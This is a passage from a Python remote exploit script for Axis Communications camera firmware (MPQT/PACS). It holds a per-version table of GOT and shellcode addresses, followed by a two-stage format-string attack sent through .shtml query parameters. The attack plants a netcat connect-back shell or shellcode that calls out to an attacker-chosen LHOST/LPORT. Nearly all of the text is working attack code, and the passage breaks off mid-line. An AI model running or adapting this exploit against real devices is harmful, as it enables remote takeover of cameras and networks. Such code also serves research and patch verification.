\r\n # MPQT\r\n 'ARM-NCSH-5.2x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x1013c, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.4x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x101fc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.5x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0xfdcc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 97, # 1st POP's\r\n 0, # 2nd POP's\r\n 41, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.6x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0xfcec, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 97, # 1st POP's\r\n 0, # 2nd POP's\r\n 41, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.7x': [ # \r\n 0x1c1c0, # Adjust to GOT free() address\r\n 0xf800, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 132, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # Will go in endless loop after exit of nc shell... DoS sux\r\n # MPQT\r\n 'ARM-NCSH-5.8x': [ # \r\n 0x1b39c, # Adjust to GOT free() address\r\n 0xf8c0, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 98, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 1, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-6.1x': [ # \r\n 0x1d2a4, # Adjust to GOT free() address\r\n# 0xecc4, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 0xecc8, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 106, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 1, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n \r\n # MPQT\r\n 'CRISv32-5.5x': [ # \r\n 0x8d148, # Adjust to GOT free() address\r\n 0x8f5a8, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.4x': [ # \r\n 0x8d0e0, # Adjust to GOT free() address\r\n 0x8f542, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.2x': [ # \r\n 0x8d0b4, # Adjust to GOT free() address\r\n 0x8f4d6, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.20.0': [ # \r\n 0x8d0e4, # Adjust to GOT free() address\r\n 0x8f546, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ]\r\n \r\n \r\n }\r\n \r\n if self.target == 0:\r\n return target_db\r\n \r\n if not self.target in target_db:\r\n print \"[!] Unknown FMS key: %s!\" % self.target\r\n sys.exit(1)\r\n \r\n if self.verbose:\r\n print \"[Verbose] Number of availible FMS keys:\",len(target_db)\r\n \r\n return target_db\r\n \r\n \r\n#\r\n# Validate correctness of HOST, IP and PORT\r\n#\r\nclass Validate:\r\n \r\n def __init__(self,verbose):\r\n self.verbose = verbose\r\n \r\n # Check if IP is valid\r\n def CheckIP(self,IP):\r\n self.IP = IP\r\n \r\n ip = self.IP.split('.')\r\n if len(ip) != 4:\r\n return False\r\n for tmp in ip:\r\n if not tmp.isdigit():\r\n return False\r\n i = int(tmp)\r\n if i < 0 or i > 255:\r\n return False\r\n return True\r\n \r\n # Check if PORT is valid\r\n def Port(self,PORT):\r\n self.PORT = PORT\r\n \r\n if int(self.PORT) < 1 or int(self.PORT) > 65535:\r\n return False\r\n else:\r\n return True\r\n \r\n # Check if HOST is valid\r\n def Host(self,HOST):\r\n self.HOST = HOST\r\n \r\n try:\r\n # Check valid IP\r\n socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP\r\n # Or we check again if it is correct typed IP\r\n if self.CheckIP(self.HOST):\r\n return self.HOST\r\n else:\r\n return False\r\n except socket.error as e:\r\n # Else check valid DNS name, and use the IP address\r\n try:\r\n self.HOST = socket.gethostbyname(self.HOST)\r\n return self.HOST\r\n except socket.error as e:\r\n return False\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n#\r\n# Help, info and pre-defined values\r\n# \r\n INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'\r\n HTTP = \"http\"\r\n HTTPS = \"https\"\r\n proto = HTTP\r\n verbose = False\r\n noexploit = False\r\n lhost = '192.168.0.1' # Default Local HOST\r\n lport = '31337' # Default Local PORT\r\n rhost = '192.168.0.90' # Default Remote HOST\r\n rport = '80' # Default Remote PORT\r\n # Not needed for the SSI exploit, here for possible future usage.\r\n# creds = 'root:pass'\r\n creds = False\r\n \r\n#\r\n# Try to parse all arguments\r\n#\r\n try:\r\n arg_parser = argparse.ArgumentParser(\r\n# prog=sys.argv[0],\r\n prog='axis-ssid-PoC.py',\r\n description=('[*]' + INFO + '\\n'))\r\n arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')\r\n arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')\r\n arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')\r\n arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')\r\n arg_parser.add_argument('--fms', required=False, help='Manual FMS key')\r\n if creds:\r\n arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')\r\n arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')\r\n arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')\r\n arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')\r\n arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')\r\n args = arg_parser.parse_args()\r\n except Exception as e:\r\n print INFO,\"\\nError: %s\\n\" % str(e)\r\n sys.exit(1)\r\n \r\n # We want at least one argument, so print out help\r\n if len(sys.argv) == 1:\r\n arg_parser.parse_args(['-h'])\r\n \r\n print \"\\n[*]\",INFO\r\n \r\n if args.verbose:\r\n verbose = args.verbose\r\n \r\n # Print out info from dictionary\r\n if args.dict:\r\n target = FMSdb(rhost,verbose).FMSkey(0)\r\n print \"[db] Number of FMS keys:\",len(target)\r\n \r\n # Print out detailed info from dictionary\r\n if verbose:\r\n \r\n print \"[db] Target details of FMS Keys availible for manual xploiting\"\r\n print \"\\n[FMS Key]\\t[GOT Address]\\t[BinSh Address]\\t[POP1]\\t[POP2]\\t[POP3]\\t[POP4]\\t[Shellcode]\"\r\n \r\n for tmp in range(0,len(target)):\r\n Key = sorted(target.keys())[tmp]\r\n temp = re.split('[-]',Key)[0:10]\r\n \r\n if temp[1] == 'NCSH':\r\n print Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',target[Key][4],'\\t',target[Key][5],'\\t',target[Key][6]\r\n \r\n print \"\\n[FMS Key]\\t[GOT Address]\\t[BSS Address]\\t[POP1]\\t[POP2]\\t[Align]\\t[Buf]\\t[Shellcode]\"\r\n for tmp in range(0,len(target)):\r\n Key = sorted(target.keys())[tmp]\r\n temp = re.split('[-]',Key)[0:10]\r\n \r\n if temp[1] != 'NCSH':\r\n print Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',len(target[Key][4]),'\\t',target[Key][5],'\\t',target[Key][6]\r\n \r\n print \"\\n\"\r\n else:\r\n print \"[db] Target FMS Keys availible for manual xploiting instead of using auto mode:\"\r\n Key = \"\"\r\n for tmp in range(0,len(target)):\r\n Key += sorted(target.keys())[tmp]\r\n Key += ', '\r\n print '\\n',Key,'\\n'\r\n sys.exit(0)\r\n \r\n#\r\n# Check validity, update if needed, of provided options\r\n#\r\n if args.https:\r\n proto = HTTPS\r\n if not args.rport:\r\n rport = '443'\r\n \r\n if creds and args.auth:\r\n creds = args.auth\r\n \r\n if args.noexploit:\r\n noexploit = args.noexploit\r\n \r\n if args.rport:\r\n rport = args.rport\r\n \r\n if args.rhost:\r\n rhost = args.rhost\r\n \r\n if args.lport:\r\n lport = args.lport\r\n \r\n if args.lhost:\r\n lhost = args.lhost\r\n \r\n # Check if LPORT is valid\r\n if not Validate(verbose).Port(lport):\r\n print \"[!] Invalid LPORT - Choose between 1 and 65535\"\r\n sys.exit(1)\r\n \r\n # Check if RPORT is valid\r\n if not Validate(verbose).Port(rport):\r\n print \"[!] Invalid RPORT - Choose between 1 and 65535\"\r\n sys.exit(1)\r\n \r\n # Check if LHOST is valid IP or FQDN, get IP back\r\n lhost = Validate(verbose).Host(lhost)\r\n if not lhost:\r\n print \"[!] Invalid LHOST\"\r\n sys.exit(1)\r\n \r\n # Check if RHOST is valid IP or FQDN, get IP back\r\n rhost = Validate(verbose).Host(rhost)\r\n if not rhost:\r\n print \"[!] Invalid RHOST\"\r\n sys.exit(1)\r\n \r\n \r\n#\r\n# Validation done, start print out stuff to the user\r\n#\r\n if noexploit:\r\n print \"[i] Test mode selected, no exploiting...\"\r\n if args.https:\r\n print \"[i] HTTPS / SSL Mode Selected\"\r\n print \"[i] Remote target IP:\",rhost\r\n print \"[i] Remote target PORT:\",rport\r\n print \"[i] Connect back IP:\",lhost\r\n print \"[i] Connect back PORT:\",lport\r\n \r\n rhost = rhost + ':' + rport\r\n \r\n#\r\n# FMS key is required into this PoC\r\n#\r\n if not args.fms:\r\n print \"[!] FMS key is required!\"\r\n sys.exit(1)\r\n else:\r\n Key = args.fms\r\n print \"[i] Trying with FMS key:\",Key\r\n \r\n#\r\n# Prepare exploiting\r\n#\r\n # Look up the FMS key in dictionary and return pointer for FMS details to use\r\n target = FMSdb(rhost,verbose).FMSkey(Key)\r\n \r\n if target[Key][6] == 'NCSH1':\r\n NCSH1 = target[Key][6]\r\n NCSH2 = \"\"\r\n elif target[Key][6] == 'NCSH2':\r\n NCSH2 = target[Key][6]\r\n NCSH1 = \"\"\r\n else:\r\n NCSH1 = \"\"\r\n NCSH2 = \"\"\r\n \r\n if Key == 'ARM-NCSH-5.8x':\r\n print \"\\nExploit working, but will end up in endless loop after exiting remote NCSH\\nDoS sux, so I'm exiting before that shit....\\n\\n\"\r\n sys.exit(0)\r\n \r\n print \"[i] Preparing shellcode:\",str(target[Key][6])\r\n \r\n # We don't use url encoded shellcode with Netcat shell\r\n # This is for MIPS/CRISv32 and ARM shellcode\r\n if not NCSH1 and not NCSH2:\r\n FMSdata = target[Key][4] # This entry aligns the injected shellcode\r\n \r\n # Building up the url encoded shellcode for sending to the target,\r\n # and replacing LHOST / LPORT in shellcode to choosen values\r\n \r\n # part of first 500 decoded bytes will be overwritten during stage #2, and since\r\n # there is different 'tailing' on the request internally, keep it little more than needed, to be safe.\r\n # Let it be 0x00, just for fun.\r\n FMSdata += '%00' * target[Key][5]\r\n \r\n # Connect back IP to url encoded\r\n ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))\r\n ip_hex = ip_hex.split()\r\n IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];\r\n \r\n # Let's break apart the hex code of LPORT into two bytes\r\n port_hex = hex(int(lport))[2:]\r\n port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n port_hex = port_hex.split()\r\n \r\n if (target[Key][6]) == 'MIPSel':\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%ff\"\r\n PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%00\"\r\n PP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n elif (target[Key][6]) == 'CRISv32':\r\n # Connect back PORT\r\n if len(port_hex) == 1:\r\n PP1 = \"%00\"\r\n PP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n elif len(port_hex) == 2:\r\n # Little Endian\r\n PP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n PP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n else:\r\n print \"[!] Unknown shellcode! (%s)\" % str(target[Key][6])\r\n sys.exit(1)\r\n \r\n # Replace LHOST / LPORT in URL encoded shellcode\r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"IP1\",IP1)\r\n shell = shell.replace(\"IP2\",IP2)\r\n shell = shell.replace(\"IP3\",IP3)\r\n shell = shell.replace(\"IP4\",IP4)\r\n shell = shell.replace(\"PP0\",PP0)\r\n shell = shell.replace(\"PP1\",PP1)\r\n FMSdata += shell\r\n \r\n#\r\n# Calculate the FMS values to be used\r\n#\r\n # Get pre-defined values\r\n ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS\r\n# POP_SIZE = 8\r\n POP_SIZE = 1\r\n \r\n GOThex = target[Key][0]\r\n BSShex = target[Key][1]\r\n GOTint = int(GOThex)\r\n \r\n # 'One-Write-Where-And-What'\r\n if not NCSH1 and not NCSH2:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n \r\n # Calculate for creating the FMS code\r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)\r\n \r\n BSSint = int(BSShex)\r\n BSSint = (BSSint - GOTint - ALREADY_WRITTEN)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated BSSint:\",BSSint\r\n \r\n # 'Two-Write-Where-And-What' using \"New Style\"\r\n elif NCSH2:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n POP3 = target[Key][4]\r\n POP4 = target[Key][5]\r\n POP2_SIZE = 2\r\n \r\n # We need to count higher than provided address for the jump\r\n BaseAddr = 0x10000 + BSShex\r\n \r\n # Calculate for creating the FMS code\r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint\r\n \r\n # Calculate FirstWhat value\r\n FirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat\r\n \r\n # Calculate SecondWhat value, so it always is 0x20300\r\n SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)\r\n \r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"LHOST\",lhost)\r\n shell = shell.replace(\"LPORT\",lport)\r\n \r\n FirstWhat = FirstWhat - len(shell)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n \r\n \r\n # 'Two-Write-Where-And-What' using \"Old Style\"\r\n elif NCSH1:\r\n \r\n POP1 = target[Key][2]\r\n POP2 = target[Key][3]\r\n POP3 = target[Key][4]\r\n POP4 = target[Key][5]\r\n POP2_SIZE = 2\r\n \r\n # FirstWhat writes with 4 bytes (Y) (0x0002YYYY)\r\n # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)\r\n if BSShex > 0x10000:\r\n MSB = 1\r\n else:\r\n MSB = 0\r\n \r\n # We need to count higher than provided address for the jump\r\n BaseAddr = 0x10000 + BSShex\r\n \r\n # Calculate for creating the FMS code\r\n ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n \r\n GOTint = (GOTint - ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)\r\n \r\n # Calculate FirstWhat value\r\n FirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n \r\n ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)\r\n \r\n # Calculate SecondWhat value, so it always is 0x203[00] or [01]\r\n SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB\r\n \r\n shell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n shell = shell.replace(\"LHOST\",lhost)\r\n shell = shell.replace(\"LPORT\",lport)\r\n \r\n GOTint = GOTint - len(shell)\r\n \r\n# if verbose:\r\n# print \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n \r\n else:\r\n print \"[!] NCSH missing, exiting\"\r\n sys.exit(1)\r\n#\r\n# Let's start the exploiting procedure\r\n#\r\n \r\n#\r\n# Stage one\r\n#\r\n if NCSH1 or NCSH2:\r\n \r\n # \"New Style\" needs to make the exploit in two stages\r\n if NCSH2:\r\n FMScode = do_FMS(rhost,verbose)\r\n # Writing 'FirstWhere' and 'SecondWhere'\r\n # 1st request\r\n FMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n #\r\n # 1st and 2nd \"Write-Where\"\r\n FMScode.AddDirectParameterN(POP1) # Write 1st Where\r\n FMScode.Add(\"XX\") # Jump up two bytes for next address\r\n FMScode.AddDirectParameterN(POP2) # Write 2nd Where\r\n FMSdata = FMScode.FMSbuild()\r\n else:\r\n FMSdata = \"\"\r\n \r\n print \"[>] StG_1: Preparing netcat connect back shell to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n else:\r\n print \"[>] StG_1: Sending and decoding shellcode to address:\",'0x{:08x}'.format(BSShex),\"(%d bytes)\" % (len(FMSdata))\r\n \r\n # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM\r\n # Actually, any valid and public readable .shtml file will work...\r\n # (One of the two below seems always to be usable)\r\n #\r\n # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two\r\n # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url\r\n #\r\n try:\r\n target_url = \"/httpDisabled.shtml?user_agent=\"\r\n if noexploit:\r\n target_url2 = target_url\r\n else:\r\n target_url2 = \"/httpDisabled.shtml?&http_user=\"\r\n \r\n if NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n except urllib2.HTTPError as e:\r\n if e.code == 404:\r\n print \"[<] Error\",e.code,e.reason\r\n target_url = \"/view/viewer_index.shtml?user_agent=\"\r\n if noexploit:\r\n target_url2 = target_url\r\n else:\r\n target_url2 = \"/view/viewer_index.shtml?&http_user=\"\r\n print \"[>] Using alternative target shtml\"\r\n if NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)\r\n except Exception as e:\r\n if not NCSH2:\r\n print \"[!] Shellcode delivery failed:\",str(e)\r\n sys.exit(1)\r\n#\r\n# Stage two\r\n#\r\n \r\n#\r\n# Building and sending the FMS code to the target\r\n#\r\n print \"[i] Building the FMS code...\"\r\n \r\n FMScode = do_FMS(rhost,verbose)\r\n \r\n # This is an 'One-Write-Where-And-What' for FMS\r\n #\r\n # Stack Example:\r\n #\r\n # Stack content | Stack address (ASLR)\r\n #\r\n # 0x0 | @0x7e818dbc -> [POP1's]\r\n # 0x0 | @0x7e818dc0 -> [free () GOT address]\r\n # 0x7e818dd0 | @0x7e818dc4>>>>>+ \"Write-Where\" (%n)\r\n # 0x76f41fb8 | @0x7e818dc8 | -> [POP2's]\r\n # 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address]\r\n # 0x76f55ab8 | @0x7e818dd0<<<<<+ \"Write-What\" (%n)\r\n # 0x1 | @0x7e818dd4\r\n #\r\n if not NCSH1 and not NCSH2:\r\n FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's \r\n FMScode.AddADDR(GOTint) # GOT Address\r\n FMScode.AddWRITEn(1) # 4 bytes Write-Where\r\n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n \r\n FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's\r\n FMScode.AddADDR(BSSint) # BSS shellcode address\r\n FMScode.AddWRITEn(1) # 4 bytes Write-What\r\n# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)\r\n \r\n # End of 'One-Write-Where-And-What'\r\n \r\n \r\n # This is an 'Two-Write-Where-And-What' for FMS\r\n #\r\n # Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd=\"xxx\" -->\r\n # We jump over all SSI tagging to end up directly where \"xxx\" will\r\n # be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())\r\n #\r\n # The Trick here is to write lower target address, that we will jump to when calling free(),\r\n # than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT\r\n # address with two LSB writes.\r\n #\r\n elif NCSH2:\r\n #\r\n # Direct parameter access for FMS exploitation are really nice and easy to use.\r\n # However, we need to exploit in two stages with two requests.\r\n # (I was trying to avoid this \"Two-Stages\" so much as possibly in this exploit developement...)\r\n #\r\n # 1. Write \"Two-Write-Where\", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)\r\n # 2. Write with \"Two-Write-What\", where 1st (LSB) and 2nd (MSB) \"Write-Where\" pointing to.\r\n # \r\n # With \"new style\", we can write with POPs independently as we don't depended of same criteria as in \"NCSH1\",\r\n # we can use any regular \"Stack-to-Stack\" pointer as we can freely choose the POP-and-Write.\r\n # [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]\r\n #\r\n # Stack Example:\r\n #\r\n # Stack content | Stack address (ASLR)\r\n #\r\n # 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st \"Write-Where\" [@Stage One]\r\n # 0x76f41fb8 | @0x7e818dc8 |\r\n # 0x76f3d70c | @0x7e818dcc |\r\n # 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st \"Write-What\" [@Stage Two]\r\n # 0x1 | @0x7e818dd4\r\n # [....]\r\n # 0x1c154 | @0x7e818e10\r\n # 0x7e818e20 | @0x7e818e14>>>>>+ 2nd \"Write-Where\" [@Stage One]\r\n # 0x76f41fb8 | @0x7e818e18 |\r\n # 0x76f3d70c | @0x7e818e1c |\r\n # 0x76f55758 | @0x7e818e20<<<<<+ 2nd \"Write-What\" [@Stage Two]\r\n # 0x1 | @0x7e818e24\r\n #\r\n \r\n FMScode.Add(shell)\r\n \r\n #\r\n # 1st and 2nd \"Write-Where\" already done in stage one\r\n #\r\n # 1st and 2nd \"Write-What\"\r\n #\r\n FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB)\r\n FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n \r\n elif NCSH1:\r\n # Could use direct argument addressing here, but I like to keep \"old style\" as well,\r\n # as it's another interesting concept.\r\n #\r\n # Two matching stack contents -> stack address in row w/o or max two POP's between,\r\n # is needed to write two bytes higher (MSB).\r\n # \r\n #\r\n # Stack Example:\r\n #\r\n # Stack Content | @Stack Address (ASLR)\r\n #\r\n # 0x9c | @7ef2fde8 -> [POP1's]\r\n # [....]\r\n # 0x1 | @7ef2fdec -> [GOTint address]\r\n #------\r\n # 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]\r\n # -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)\r\n # 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]\r\n # ------ | |\r\n # [....] -> [POP3's] | |\r\n # 0x7fb99dc | @7ef2fe7c | |\r\n # 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX]\r\n # 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))\r\n # -> [POP4's] |\r\n # (nil) | @7ef2fe88 | [Count up to 0x20300]\r\n # 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)\r\n \r\n FMScode.Add(shell)\r\n \r\n # Write FirstWhere for 'FirstWhat'\r\n FMScode.AddPOP(POP1)\r\n FMScode.AddADDR(GOTint) # Run up to free() GOT address\r\n FMScode.AddWRITEn(1)\r\n \r\n # Write SecondWhere for 'SecondWhat'\r\n #\r\n # This is special POP with 1 byte, we can maximum POP 2!\r\n #\r\n # This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement\r\n # for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.\r\n # Kept as reference as we now using direct parameter access AKA 'New Style\" for 5.2x/5.4x\r\n #\r\n if POP2 != 0:\r\n # We only want to write 'SecondWhat' two bytes higher at free() GOT\r\n if POP2 > 2:\r\n print \"POP2 can't be greater than two!\"\r\n sys.exit(1)\r\n if POP2 == 1:\r\n FMScode.Add(\"%2c\")\r\n else:\r\n FMScode.Add(\"%1c%1c\")\r\n else:\r\n FMScode.Add(\"XX\")\r\n FMScode.AddWRITEn(1)\r\n \r\n # Write FirstWhat pointed by FirstWhere\r\n FMScode.AddPOP(POP3) # Old Style POP's\r\n FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.\r\n FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)\r\n \r\n # Write SecondWhat pointed by SecondWhere\r\n FMScode.AddPOP(POP4) # Old Style POP's\r\n FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)\r\n FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation\r\n \r\n else:\r\n sys.exit(1)\r\n \r\n FMSdata = FMScode.FMSbuild()\r\n \r\n print \"[>] StG_2: Writing shellcode address to free() GOT address:\",'0x{:08x}'.format(GOThex),\"(%d bytes)\" % (len(FMSdata))\r\n \r\n # FMS comes here, and calculations start after '=' in the url\r\n try:\r\n if NCSH1 or NCSH2:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell\r\n else:\r\n html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode\r\n except urllib2.HTTPError as e:\r\n print \"[!] Payload delivery failed:\",str(e)\r\n sys.exit(1)\r\n except Exception as e:\r\n # 1st string returned by HTTP mode, 2nd by HTTPS mode\r\n if str(e) == \"timed out\" or str(e) == \"('The read operation timed out',)\":\r\n print \"[i] Timeout! Payload delivered sucessfully!\"\r\n else:\r\n print \"[!] Payload delivery 